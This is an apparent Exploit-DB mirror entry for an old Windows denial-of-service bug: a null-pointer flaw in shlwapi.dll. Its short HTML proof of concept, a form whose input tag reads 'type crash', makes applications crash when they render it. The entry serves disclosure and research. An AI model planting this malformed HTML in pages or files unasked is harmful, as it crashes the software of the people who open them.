exploit-db-mirror/exploits/windows/dos/22518.html
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

9 lines
No EOL
439 B
HTML

source: https://www.securityfocus.com/bid/7402/info
The 'shlwapi.dll' dynamic link library causes a calling application to fail when it attempts to render certain malformed HTML tags. This appears to be due to an attempt to perform a string comparison where one of the strings is a null pointer. It has been reported that this vulnerability could not be exploited to cause code execution.
<html>
<form>
<input type crash>
</form>
</html>